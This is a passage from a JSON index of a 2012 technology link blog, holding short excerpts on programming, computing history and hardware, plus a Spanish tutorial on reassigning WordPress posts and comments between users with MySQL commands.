paper\nawards from the top-tier conferences in each area, but some\nconferences do not have such an award (e.g. SIGGRAPH, CAV).\n”Distinguished paper award” and ”outstanding paper award” are included\nbut not ”best student paper” (e.g. NIPS) or ”best 10-year old paper”\n(e.g. POPL)\u003c/p\u003e","title":"Best Paper Awards in Computer Science (since 1996)"},{"content":" When developers shift from PHP, Ruby or any other platform to Python, the very first road block they face (most often) is a lack of an overall understanding of the Python ecosystem. Developers often yearn for a tutorial or resource that explains how to accomplish most tasks in a more or less standard way.\nWhat follows is an extract from the internal wiki at my workplace, which documents the basics of the Python ecosystem for web application development for our interns, trainees and experienced developers who shift to Python from other platforms.\n» Mir Nazim | mirnazim.org\n","permalink":"http://karpoke.ignaciocano.com/2012/08/15/python-ecosystem-an-introduction/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhen developers shift from PHP, Ruby or any other platform to Python,\nthe very first road block they face (most often) is a lack of an\noverall understanding of the Python ecosystem. Developers often yearn\nfor a tutorial or resource that explains how to accomplish most tasks\nin a more or less standard way.\u003c/p\u003e\n\u003cp\u003eWhat follows is an extract from the internal wiki at my workplace,\nwhich documents the basics of the Python ecosystem for web application\ndevelopment for our interns, trainees and experienced developers who\nshift to Python from other platforms.\u003c/p\u003e","title":"Python Ecosystem - An Introduction"},{"content":" I just made a tool to transform any javascript code into an equivalent sequence of ()[]{}!+ characters. You can try it here, or grab it from github or npm. Keep on reading if you want to know how it works.\nWhat do you know about non-alphanumeric XSS?\nThe other day one of my friends asked me that question on IRC, pointing me to some articles on sla.ckers.org where they tried to create some scripts like alert(1) with non-alphanumeric characters.\nAs a security researcher and a penetration tester, he insisted that extending that concept to any javascript source would be really useful for bypassing IDSs, IPSs and WAFs. So challange accepted!\n» Patricio Palladino | patriciopalladino.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/13/brainfuck-beware-javascript-is-after-you/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI just made a tool to transform any javascript code into an equivalent\nsequence of ()[]{}!+ characters. You can try it here, or grab it from\ngithub or npm. Keep on reading if you want to know how it works.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWhat do you know about non-alphanumeric XSS?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eThe other day one of my friends asked me that question on IRC,\npointing me to some articles on sla.ckers.org where they tried to\ncreate some scripts like alert(1) with non-alphanumeric characters.\u003c/p\u003e","title":"Brainfuck beware: JavaScript is after you!"},{"content":" Twenty-four years ago today, I had a very bad day.\nOn August 8, 1988, I was a senior in high school. I was working my after school and weekend job at Safeway as a cashier, when the store manager suddenly walked over and said I better stop ringing up customers and talk to my mother on the store phone right now. Mom told me to come home immediately because, well, there were police at the front door asking for me with some legal papers in hand.\n» Jeff Atwood | codinghorror.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/10/i-was-a-teenage-hacker/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTwenty-four years ago today, I had a very bad day.\u003c/p\u003e\n\u003cp\u003eOn August 8, 1988, I was a senior in high school. I was working my\nafter school and weekend job at Safeway as a cashier, when the store\nmanager suddenly walked over and said I better stop ringing up\ncustomers and talk to my mother on the store phone right now. Mom told\nme to come home immediately because, well, there were police at the\nfront door asking for me with some legal papers in hand.\u003c/p\u003e","title":"I Was a Teenage Hacker"},{"content":" You must have heard about The Internet map by now. If not, you can take a look at it here. Roughly speaking, the Internet Map displays websites’ location according to users’ behavior. Similar websites visited by the same people are situated close to one another; different websites not having mutual visitors are situated at a considerable distance from each other. The size of a website on the map is determined by its average click rating while the color is defined by belonging to a nationality. You can get a more detailed notion referring to the About section on the website of the Map.\nIn the present article I would like to tell you how the website of The Internet map is organized, which technologies ensure its normal day-to-day functioning and what steps had to be taken in order to sustain a massive surge of visitors wishing to have a look at the map.\nThe operability of the Internet Map is enabled by present-day internet-giants’ technologies: the Map’s visual display is powered by Google Maps engine by Google Inc., web query processing is performed with Microsoft’s .net technologies, while Amazon Web Services by Amazon is responsible for hosting and content delivery. All the three components are vital for the Map’s normal operation. With some effort, alternatives can be found, but I am not confident that it will bring much of a benefit.\n» irriss | codeproject.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/08/the-web-architecture-of-the-internet-map/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou must have heard about The Internet map by now. If not, you can\ntake a look at it here. Roughly speaking, the Internet Map displays\nwebsites’ location according to users’ behavior. Similar websites\nvisited by the same people are situated close to one another;\ndifferent websites not having mutual visitors are situated at a\nconsiderable distance from each other. The size of a website on the\nmap is determined by its average click rating while the color is\ndefined by belonging to a nationality. You can get a more detailed\nnotion referring to the About section on the website of the Map.\u003c/p\u003e","title":"The web architecture of The Internet map"},{"content":" The history of the computer industry is filled with fascinating tales of riches that appear to practically fall from the sky.\nAlong with stories of riches won, there are stories of opportunities missed. Take that of Ronald Wayne, who cofounded Apple Computer with Steve Wozniak and Steve Jobs but sold his shares for just US $2300. And John Atanasoff, who proudly showed his digital computer design to John Mauchly”who later codesigned the Eniac, often defined as the first electronic computer, without credit to Atanasoff.\nBut by far the most famous story of missed fame and fortune is that of Gary Kildall. A pioneer in computer operating systems, Kildall wrote Control Program for Microcomputers (CP/M), the operating system used on many of the early hobbyist personal computers, such as the MITS Altair 8800, the IMSAI 8080, and the Osborne 1, before IBM introduced its own machine, the PC. Kildall could have virtually owned the personal computer operating system business, had he sold that system to IBM. He didn’t. Why is a matter of speculation, mundane gossip, and urban legend. We’ll get to that.\nBill Gates at Microsoft, however, did sell an operating system to IBM”and reaped then-unimaginable rewards. A cloud of speculation has hung over that part of the story as well. The big question: Was the operating system Gates sold to IBM his to sell? Or was a key part of it stolen from Kildall?\nMicrosoft has stated that its hands were clean. Kildall maintained that QDOS, and subsequently MS-DOS, had been directly copied from CP/M and thus infringed on his copyright. But until now there’s been no way to conduct a reliable examination of the software itself, to look inside MS-DOS for the fingerprints of CP/M, and settle the issue once and for all.\n» Bob Zeidman | spectrum.ieee.org\n","permalink":"http://karpoke.ignaciocano.com/2012/08/08/did-bill-gates-steal-the-heart-of-dos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe history of the computer industry is filled with fascinating tales\nof riches that appear to practically fall from the sky.\u003c/p\u003e\n\u003cp\u003eAlong with stories of riches won, there are stories of opportunities\nmissed. Take that of Ronald Wayne, who cofounded Apple Computer with\nSteve Wozniak and Steve Jobs but sold his shares for just US $2300.\nAnd John Atanasoff, who proudly showed his digital computer design to\nJohn Mauchly”who later codesigned the Eniac, often defined as the\nfirst electronic computer, without credit to Atanasoff.\u003c/p\u003e","title":"Did Bill Gates Steal the Heart of DOS?"},{"content":" I’ve had too many personal experiences get messed up just because companies change things on the cloud. I’ve come to a depressed state of feeling that I own nothing on the cloud and have no ability to keep things working the way they do. Features change and get dropped, things you depend on disappear, etc. And no company will ever take responsibility. It’s rare to ever get told what really happened.\n» Steve Wozniak | gizmodo.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/07/why-the-cloud-sucks/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve had too many personal experiences get messed up just because\ncompanies change things on the cloud. I’ve come to a depressed state\nof feeling that I own nothing on the cloud and have no ability to keep\nthings working the way they do. Features change and get dropped,\nthings you depend on disappear, etc. And no company will ever take\nresponsibility. It’s rare to ever get told what really happened.\u003c/p\u003e","title":"Why the Cloud Sucks"},{"content":" Wi-Fi radio signals are found in 61 percent of homes in the U.S. and 25 percent worldwide, so Karl Woodbridge and Kevin Chetty, researchers at University College London, designed their detector to use these ubiquitous signals. When a radio wave reflects off a moving object, its frequency changes”a phenomenon called the Doppler effect. Their radar prototype identifies frequency changes to detect moving objects. It’s about the size of a suitcase and contains a radio receiver composed of two antennas ;íand a signal-processing unit. In tests, they have used it to determine a person’s location, speed and direction”even through a one-foot-thick brick wall. Because the device itself doesn’t emit any radio waves, it can’t be detected.\n» David Hambling | popsci.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/06/seeing-through-walls-with-a-wireless-router/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWi-Fi radio signals are found in 61 percent of homes in the U.S. and\n25 percent worldwide, so Karl Woodbridge and Kevin Chetty, researchers\nat University College London, designed their detector to use these\nubiquitous signals. When a radio wave reflects off a moving object,\nits frequency changes”a phenomenon called the Doppler effect. Their\nradar prototype identifies frequency changes to detect moving objects.\nIt’s about the size of a suitcase and contains a radio receiver\ncomposed of two antennas ;íand a signal-processing unit. In tests,\nthey have used it to determine a person’s location, speed and\ndirection”even through a one-foot-thick brick wall. Because the device\nitself doesn’t emit any radio waves, it can’t be detected.\u003c/p\u003e","title":"Seeing Through Walls With a Wireless Router"},{"content":" CERN, the European Organization for Nuclear Research, is where it all began in March 1989. A physicist, Tim Berners-Lee, wrote a proposal for information management showing how information could be transferred easily over the Internet by using hypertext, the now familiar point-and-click system of navigating through information. The following year, Robert Cailliau, a systems engineer, joined in and soon became its number one advocate.\nThe idea was to connect hypertext with the Internet and personal computers, thereby having a single information network to help CERN physicists share all the computer-stored information at the laboratory. Hypertext would enable users to browse easily between texts on web pages using links. The first examples were developed on NeXT computers.\n» info.cern.ch\n","permalink":"http://karpoke.ignaciocano.com/2012/08/06/the-website-of-the-worlds-first-ever-web-server/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCERN, the European Organization for Nuclear Research, is where it all\nbegan in March 1989. A physicist, Tim Berners-Lee, wrote a proposal\nfor information management showing how information could be\ntransferred easily over the Internet by using hypertext, the now\nfamiliar point-and-click system of navigating through information. The\nfollowing year, Robert Cailliau, a systems engineer, joined in and\nsoon became its number one advocate.\u003c/p\u003e\n\u003cp\u003eThe idea was to connect hypertext with the Internet and personal\ncomputers, thereby having a single information network to help CERN\nphysicists share all the computer-stored information at the\nlaboratory. Hypertext would enable users to browse easily between\ntexts on web pages using links. The first examples were developed on\nNeXT computers.\u003c/p\u003e","title":"The website of the world’s first-ever web server"},{"content":" Helping Companies, and Hackers to get things done. Companies test their servers or Web Apps covered by anonymity and confidentiality, while Hackers get paid for what they love to do most: Hacking Servers\n» hackaserver.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/04/crowd-source-audit-platform-for-manual-pentest/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHelping Companies, and Hackers to get things done. Companies test\ntheir servers or Web Apps covered by anonymity and confidentiality,\nwhile Hackers get paid for what they love to do most: Hacking Servers\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://hackaserver.com/\"\u003ehackaserver.com\u003c/a\u003e\u003c/p\u003e","title":"Crowd Source Audit Platform for Manual PenTest"},{"content":"Uno de los peores hábitos, en cuanto a seguridad en informática se refiere, es utilizar la cuenta de administrador de forma compulsiva para todo, sin importar que la tarea que estemos haciendo requiera privilegios de administrador o no. Esto se puede aplicar tanto a la cuenta de root en un sistema GNU/Linux como al usuario administrador en WordPress. Lo ideal sería utilizar una cuenta con el mínimo nivel de privilegios posible que nos permita llevar a cabo nuestra tarea.\nEn WordPress hay varios niveles de privilegios, desde suscriptor que sólo puede modificar su perfil, hasta super administrador, pasando por diferentes niveles según se permita la creación, edición o eliminación de artículos.\nSi ya teníamos artículos publicados, por ejemplo con el usuario administrador, y queremos pasarlos a otro usuario, por ejemplo con perfil autor, podemos hacerlo, utilizando la cuenta de administrador, uno a uno. Si teníamos muchos artículos, mejor hacerlo directamente sobre la base de datos.\nNos conectamos a la base de datos de WordPress.\n$ mysql -uwpuser -p wpdb Las tablas que vamos a utilizar son wp_posts y wp_users. Podemos ver información relativa a ellas con el comando desc:\nmysql\u0026gt; desc wp_users; +---------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +---------------------+---------------------+------+-----+---------------------+----------------+ | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | user_login | varchar(60) | NO | MUL | | | | user_pass | varchar(64) | NO | | | | | user_nicename | varchar(50) | NO | MUL | | | | user_email | varchar(100) | NO | | | | | user_url | varchar(100) | NO | | | | | user_registered | datetime | NO | | 0000-00-00 00:00:00 | | | user_activation_key | varchar(60) | NO | | | | | user_status | int(11) | NO | | 0 | | | display_name | varchar(250) | NO | | | | +---------------------+---------------------+------+-----+---------------------+----------------+ mysql\u0026gt; desc wp_posts; +-----------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +-----------------------+---------------------+------+-----+---------------------+----------------+ | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | post_author | bigint(20) unsigned | NO | MUL | 0 | | | post_date | datetime | NO | | 0000-00-00 00:00:00 | | | post_date_gmt | datetime | NO | | 0000-00-00 00:00:00 | | | post_content | longtext | NO | MUL | NULL | | | post_title | text | NO | MUL | NULL | | | post_excerpt | text | NO | | NULL | | | post_status | varchar(20) | NO | | publish | | | comment_status | varchar(20) | NO | | open | | | ping_status | varchar(20) | NO | | open | | | post_password | varchar(20) | NO | | | | | post_name | varchar(200) | NO | MUL | | | | to_ping | text | NO | | NULL | | | pinged | text | NO | | NULL | | | post_modified | datetime | NO | | 0000-00-00 00:00:00 | | | post_modified_gmt | datetime | NO | | 0000-00-00 00:00:00 | | | post_content_filtered | longtext | NO | | NULL | | | post_parent | bigint(20) unsigned | NO | MUL | 0 | | | guid | varchar(255) | NO | | | | | menu_order | int(11) | NO | | 0 | | | post_type | varchar(20) | NO | MUL | post | | | post_mime_type | varchar(100) | NO | | | | | comment_count | bigint(20) | NO | | 0 | | +-----------------------+---------------------+------+-----+---------------------+----------------+ Necesitamos conocer los identificadores del usuario origen y usuario destino. Por ejemplo:\nmysql\u0026gt; select ID, user_login from wp_users; +----+------------+ | ID | user_login | +----+------------+ | 1 | admin | | 2 | user | +----+------------+ Cambiamos los artículos del viejo usuario (con identificador 1) al nuevo usuario (con identificador 2):\nmysql\u0026gt; update wp_posts set post_author=2 where post_author=1; Y listos.\nCambiar el nombre de usuario Cambiar el nombre de usuario que se utiliza para iniciar sesión, una vez creado el usuario, es algo que no se puede hacer desde el panel de administración de WordPress, pero podemos cambiarlo desde la consola MySQL. Por ejemplo, para cambiar el usuario admin por newlogin:\n$ update wp_users set user_login=\u0026#34;newlogin\u0026#34; where user_login=\u0026#34;admin\u0026#34;; Actualizado el 12 de enero de 2014 Enumeración de usuarios WordPress permite mostrar un listado de los artículos de cada usuario mediante una URL como http://www.example.com/author/username/. El problema es que, por defecto, este nombre de usuario coincide con el nombre de usuario que se utiliza para iniciar sesión en el panel de administración. Encontrar este nombre de usuario no es difícil, ya que los enlaces del tipo http://www.example.com/?author=1 redirigen a un enlace como el anterior, pero con el nombre del usuario que se corresponde con el identificador utilizado, en este ejemplo el 1, que además suele ser el usuario administrador.\nAfortunadamente, se pueden tener nombres de usuario diferentes para iniciar sesión y para mostrar los artículos de un usuario a través el campo user_nicename. Podemos modificar el nuestro mediante:\nmysql\u0026gt; update wp_users set user_nicename=\u0026#34;nick\u0026#34; where user_login=\u0026#34;username\u0026#34;; Actualizado el 15 de agosto de 2012 Cambiar la información del autor de los comentarios Los comentarios en WordPress también tienen asociado un usuario. Primero veamos los campos que tiene la tabla wp_comments:\nmysql\u0026gt; desc wp_comments; +----------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------------------+---------------------+------+-----+---------------------+----------------+ | comment_ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | comment_post_ID | bigint(20) unsigned | NO | MUL | 0 | | | comment_author | tinytext | NO | | NULL | | | comment_author_email | varchar(100) | NO | | | | | comment_author_url | varchar(200) | NO | | | | | comment_author_IP | varchar(100) | NO | | | | | comment_date | datetime | NO | | 0000-00-00 00:00:00 | | | comment_date_gmt | datetime | NO | MUL | 0000-00-00 00:00:00 | | | comment_content | text | NO | | NULL | | | comment_karma | int(11) | NO | | 0 | | | comment_approved | varchar(20) | NO | MUL | 1 | | | comment_agent | varchar(255) | NO | | | | | comment_type | varchar(20) | NO | | | | | comment_parent | bigint(20) unsigned | NO | MUL | 0 | | | user_id | bigint(20) unsigned | NO | | 0 | | +----------------------+---------------------+------+-----+---------------------+----------------+ Si el usuario está registrado, el campo user_id tiene el identificador del usuario, sino le asigna un 0. Sin embargo, el nombre, la URL y el correo electrónico, que queda registrado aunque no se muestre, son los que tuviera el usuario en el momento de hacer el comentario, por lo que si el usuario los modifica posteriormente, los cambios no quedan reflejados en los comentarios anteriores.\nPara ver los comentarios de usuarios registrados podemos ejecutar:\nmysql\u0026gt; select comment_author, comment_author_url, comment_author_email, comment_author_IP, user_id from wp_comments where user_id != 0; Si queremos cambiar el autor de los comentarios de un usuario concreto y actualizar la información asociada, por ejemplo cambiar el autor de los comentarios del usuario con identificador 1 al que tiene el 2, no tenemos más que ejecutar:\nmysql\u0026gt; update wp_comments c, wp_users u set c.comment_author=u.user_nicename, c.comment_author_url=u.user_url, c.comment_author_email=u.user_email, c.user_id=u.ID where u.ID=2 and c.user_id=1; Dependiendo de la configuración de MySQL, es posible que nos aparezca el siguiente error:\nERROR 1175 (HY000): You are using safe update mode and you tried to update a table without a WHERE that uses a KEY column Si están activadas las actualizaciones seguras, no se permite ejecutar ninguna sentencia de actualización o borrado si no se utiliza un campo clave en el WHERE o no se utiliza la cláusula LIMIT. En este caso no estamos seleccionando los comentarios por ningún campo clave, de ahí que aparezca el error.\nPodemos desactivar las actualizaciones seguras ejecutando:\nmysql\u0026gt; set SQL_SAFE_UPDATES=0; Y ahora ya sí que nos dejará ejecutar la actualización. Si queremos volver a activar las actualizaciones seguras, no tenemos más que asignarle un valor de 1.\n","permalink":"http://karpoke.ignaciocano.com/2012/08/02/de-usuarios-en-wordpress/","summary":"\u003cp\u003eUno de los peores hábitos, en cuanto a seguridad en informática se\nrefiere, es utilizar la cuenta de administrador de forma compulsiva para\ntodo, sin importar que la tarea que estemos haciendo requiera\nprivilegios de administrador o no. Esto se puede aplicar tanto a la\ncuenta de \u003ccode\u003eroot\u003c/code\u003e en un sistema GNU/Linux como al usuario administrador\nen WordPress. Lo ideal sería utilizar una cuenta con el mínimo nivel de\nprivilegios posible que nos permita llevar a cabo nuestra tarea.\u003c/p\u003e","title":"De usuarios en WordPress"},{"content":" While transistors have many uses, one of the less known uses by amateurs is the ability for bipolar transistors to turn things on and off. While there are limitations as to what we can switch on and off, transistor switches offer lower cost and substantial reliability over conventional mechanical relays. In this article, we will review the basic principles for transistor switches using common bipolar transistors.\nThe most commonly used transistor switch is the PNP variety shown in Figure 1. The secret to making a transistor switch work properly is to get the transistor in a saturation state. For this to happen we need to know the maximum load current for the device to be turned on and the minimum HFE of the transistor.\n» Mike Martell | rason.org\n","permalink":"http://karpoke.ignaciocano.com/2012/08/02/using-bipolar-transistors-as-switches/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhile transistors have many uses, one of the less known uses by\namateurs is the ability for bipolar transistors to turn things on and\noff. While there are limitations as to what we can switch on and off,\ntransistor switches offer lower cost and substantial reliability over\nconventional mechanical relays. In this article, we will review the\nbasic principles for transistor switches using common bipolar\ntransistors.\u003c/p\u003e\n\u003cp\u003eThe most commonly used transistor switch is the PNP variety shown in\nFigure 1. The secret to making a transistor switch work properly is to\nget the transistor in a saturation state. For this to happen we need\nto know the maximum load current for the device to be turned on and\nthe minimum HFE of the transistor.\u003c/p\u003e","title":"Using Bipolar Transistors As Switches"},{"content":" La Escuela Superior de Informática de la Universidad de Castilla-La Mancha ha liberado el material de la primera edición del Curso de Experto en Desarrollo de Videojuegos. El material, compuesto por 4 libros de más de 1.200 páginas en total y múltiples ejemplos de código fuente, se basa principalmente en tecnologías y estándares libres. Casi la totalidad de los ejemplos del curso han sido desarrollados en GNU/Linux. Puedes descargar los libros gratuitamente en la web del curso (formato PDF), en EPUB o comprar los libros en papel. Los ejemplos del libro se distribuye con licencia GPLv3 y el libro con licencia Creative Commons BY NC ND\n» cursodesarrollovideojuegos.com | via barrapunto.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/01/la-esi-de-ciudad-real-libera-4-libros-sobre-desarrollo-de-videojuegos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa Escuela Superior de Informática de la Universidad de Castilla-La\nMancha ha liberado el material de la primera edición del Curso de\nExperto en Desarrollo de Videojuegos. El material, compuesto por 4\nlibros de más de 1.200 páginas en total y múltiples ejemplos de código\nfuente, se basa principalmente en tecnologías y estándares libres.\nCasi la totalidad de los ejemplos del curso han sido desarrollados en\nGNU/Linux. Puedes descargar los libros gratuitamente en la web del\ncurso (formato PDF), en EPUB o comprar los libros en papel. Los\nejemplos del libro se distribuye con licencia GPLv3 y el libro con\nlicencia Creative Commons BY NC ND\u003c/p\u003e","title":"La ESI de Ciudad Real libera 4 libros sobre Desarrollo de Videojuegos"},{"content":" A basic tenets of UNIX philosophy is to create programs (or processes) that do one thing, and do that one thing well. It is a philosophy demanding careful thought about interfaces and ways of joining these smaller (hopefully more simple) processes together to create useful results. Normally textual data flows between these interfaces. Over time, more and more advanced text processing tools and languages have been developed. For languages, earlier on there was perl, later came python, and ruby. While these and other languages are very capable text processors, such tools are not always available, especially in a production environment. In this article, a number of basic UNIX text processing commands are demonstrated and may be used individually or in conjunction with each other to solve problems which may also be addressed with newer languages. For many people, an example provides more information than long winded explanations. Please note because of the variety of UNIX and UNIX-like systems available, command flags, program behavior, and output differs between implementations.\n» Brad Yoes | ibm.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/introduction-to-text-manipulation-on-unix-based-systems/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA basic tenets of UNIX philosophy is to create programs (or processes)\nthat do one thing, and do that one thing well. It is a philosophy\ndemanding careful thought about interfaces and ways of joining these\nsmaller (hopefully more simple) processes together to create useful\nresults. Normally textual data flows between these interfaces. Over\ntime, more and more advanced text processing tools and languages have\nbeen developed. For languages, earlier on there was perl, later came\npython, and ruby. While these and other languages are very capable\ntext processors, such tools are not always available, especially in a\nproduction environment. In this article, a number of basic UNIX text\nprocessing commands are demonstrated and may be used individually or\nin conjunction with each other to solve problems which may also be\naddressed with newer languages. For many people, an example provides\nmore information than long winded explanations. Please note because of\nthe variety of UNIX and UNIX-like systems available, command flags,\nprogram behavior, and output differs between implementations.\u003c/p\u003e","title":"Introduction to text manipulation on UNIX-based systems"},{"content":" You want to teach yourself vim (the best text editor known to human kind) in the fastest way possible. This my way of doing it. You start by learning the minimal to survive, then you integrate all the tricks slowly.\nVim the Six Billion Dollar editor\nBetter, Stronger, Faster.\nLearn vim and it will be your last text editor. There isn’t any better text editor that I know of. It is hard to learn, but incredible to use.\nI suggest you teach yourself Vim in 4 steps:\nSurvive Feel comfortable Feel Better, Stronger, Faster Use superpowers of vim By the end of this journey, you’ll become a vim superstar.\nBut before we start, just a warning. Learning vim will be painful at first. It will take time. It will be a lot like playing a musical instrument. Don’t expect to be more efficient with vim than with another editor in less than 3 days. In fact it will certainly take 2 weeks instead of 3 days.\n» Yann Esposito | yannesposito.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/learn-vim-progressively/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou want to teach yourself vim (the best text editor known to human\nkind) in the fastest way possible. This my way of doing it. You start\nby learning the minimal to survive, then you integrate all the tricks\nslowly.\u003c/p\u003e\n\u003cp\u003eVim the Six Billion Dollar editor\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eBetter, Stronger, Faster.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eLearn vim and it will be your last text editor. There isn’t any better\ntext editor that I know of. It is hard to learn, but incredible to\nuse.\u003c/p\u003e","title":"Learn Vim Progressively"},{"content":" N-Tier architecture is an industry-proved software architecture model, suitable to support enterprise-level client/server applications by resolving issues like scalability, security, fault tolerance and etc. .NET has many tools and features, but .NET doesn’t have pre-defined ways to guard how to implement N-Tier architecture. Therefore, in order to achieve good design and implementation of N-Tier architecture in .NET, understanding fully its concepts is very important. However, many of us may hear, read or use N-Tier architecture for many years but still misunderstand its concepts more or less. This article tries to clarify many basic concepts in N-Tier architecture from all aspects, and also provide some practical tips. The tips in this article are based on the assumption that a team has a full control over all layers of the N-Tier architecture.\n» W. HU | codeproject.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/n-tier-architecture-and-tips/","summary":"\u003cblockquote\u003e\n\u003cp\u003eN-Tier architecture is an industry-proved software architecture model,\nsuitable to support enterprise-level client/server applications by\nresolving issues like scalability, security, fault tolerance and etc.\n.NET has many tools and features, but .NET doesn’t have pre-defined\nways to guard how to implement N-Tier architecture. Therefore, in\norder to achieve good design and implementation of N-Tier architecture\nin .NET, understanding fully its concepts is very important. However,\nmany of us may hear, read or use N-Tier architecture for many years\nbut still misunderstand its concepts more or less. This article tries\nto clarify many basic concepts in N-Tier architecture from all\naspects, and also provide some practical tips. The tips in this\narticle are based on the assumption that a team has a full control\nover all layers of the N-Tier architecture.\u003c/p\u003e","title":"N-Tier Architecture And Tips"},{"content":" In the same vein, programmers who pay attention to how they construct written language also tend to pay a lot more attention to how they code. You see, at its core, code is prose. Great programmers are more than just code monkeys; according to Stanford programming legend Donald Knuth they are ”essayists who work with traditional aesthetic and literary forms.” The point: programming should be easily understood by real human beings ” not just computers.\nAnd just like good writing and good grammar, when it comes to programming, the devil’s in the details. In fact, when it comes to my whole business, details are everything.\n» Kyle Wiens | blogs.hbr.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/i-wont-hire-people-who-use-poor-grammar-heres-why/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the same vein, programmers who pay attention to how they construct\nwritten language also tend to pay a lot more attention to how they\ncode. You see, at its core, code is prose. Great programmers are more\nthan just code monkeys; according to Stanford programming legend\nDonald Knuth they are ”essayists who work with traditional aesthetic\nand literary forms.” The point: programming should be easily\nunderstood by real human beings ” not just computers.\u003c/p\u003e","title":"I won’t hire people who use poor grammar. here’s why."},{"content":" En un lugar de Melee Island^TM^ de cuyo nombre no quiero acordarme, nuestro wannabe pirata se llamaba Guybrush Threepwood. Tenía unos veinte años, y pesaba poco más de 54 kilos. Aguantaba la respiración durante 10 minutos, intentaba vender unas bonitas chaquetas de piel y soñaba con ser pirata. Todo eran peleas de espadas e insultos, grog y pollos de goma con poleas en medio, hasta que cayó enamorado de la gobernadora Marley que, tras ser secuestrada, le condujo hasta el malvado y temible pirata fantasma LeChuck.\nSupongo que la mayoría de los que tienen infancia habrán reconocido en apenas dos líneas que se trata de –seguramente- la aventura gráfica más famosa de LucasArts: Monkey Island.\n» blissy91 | tuprincesaestaenotrocastillo.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/monkey-island-y-lucasarts-de-referencias-a-referente/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn un lugar de Melee Island^TM^ de cuyo nombre no quiero acordarme,\nnuestro wannabe pirata se llamaba Guybrush Threepwood. Tenía unos\nveinte años, y pesaba poco más de 54 kilos. Aguantaba la respiración\ndurante 10 minutos, intentaba vender unas bonitas chaquetas de piel y\nsoñaba con ser pirata. Todo eran peleas de espadas e insultos, grog y\npollos de goma con poleas en medio, hasta que cayó enamorado de la\ngobernadora Marley que, tras ser secuestrada, le condujo hasta el\nmalvado y temible pirata fantasma LeChuck.\u003c/p\u003e","title":"Monkey Island y LucasArts: de referencias a referente"},{"content":" Ninguna multinacional tiene tantas sucursales, ninguna empresa engloba tanto personal a su cargo y ningún holding ha podido sacar al mercado un producto más rentable. Jamás ha existido un negocio tan beneficioso y duradero a pesar de haber demostrado con el paso del tiempo estar tan radicalmente equivocado en sus afirmaciones. Es el sueño dorado de cualquier empresario: crecer sin límite sin que ninguno de tus errores detenga tu prosperidad.\n» Javier Peláez | aldea-irreductible.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2012/07/31/el-dios-de-las-pequenas-rendijas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNinguna multinacional tiene tantas sucursales, ninguna empresa engloba\ntanto personal a su cargo y ningún holding ha podido sacar al mercado\nun producto más rentable. Jamás ha existido un negocio tan beneficioso\ny duradero a pesar de haber demostrado con el paso del tiempo estar\ntan radicalmente equivocado en sus afirmaciones. Es el sueño dorado de\ncualquier empresario: crecer sin límite sin que ninguno de tus errores\ndetenga tu prosperidad.\u003c/p\u003e","title":"El dios de las pequeñas rendijas"},{"content":" You can tell a lot about a shell user by looking at their prompt. Most shell users will use whatever the system’s default prompt is for their entire career. Under many Linux distributions, this prompt includes the username, the hostname, and the current working directory, along with a $ sigil for regular users, and a # for root.\n» Tom Ryder | blog.sanctum.geek.nz\n","permalink":"http://karpoke.ignaciocano.com/2012/07/27/bash-prompts/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou can tell a lot about a shell user by looking at their prompt. Most\nshell users will use whatever the system’s default prompt is for their\nentire career. Under many Linux distributions, this prompt includes\nthe username, the hostname, and the current working directory, along\nwith a $ sigil for regular users, and a # for root.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tom Ryder | \u003ca href=\"http://blog.sanctum.geek.nz/bash-prompts/\"\u003eblog.sanctum.geek.nz\u003c/a\u003e\u003c/p\u003e","title":"Bash prompts"},{"content":"Por ahora, la Raspberry Pi viene sin carcasa, por lo que no sólo hay opciones comerciales, sino que la comunidad ha tenido ideas muy creativas: [1], [2] y [3].\nEntre todas las opciones, la de imprimir tu propia carcasa me ha llamado la atención. Es sencilla, rápida de hacer y, sobre todo, incluye un plano.\nUtilizando este plano como base, hemos fabricado una carcasa en madera de contrachapado de 3mm. Las dimensiones del plano encajan en la Raspberry Pi como anillo al dedo. Lo único que hemos tenido que tener en cuenta es el grosor de la madera para las piezas laterales:\naumentar el alto de las piezas laterales largas en 3mm por arriba y 3mm por abajo aumentar el ancho y el alto de las piezas 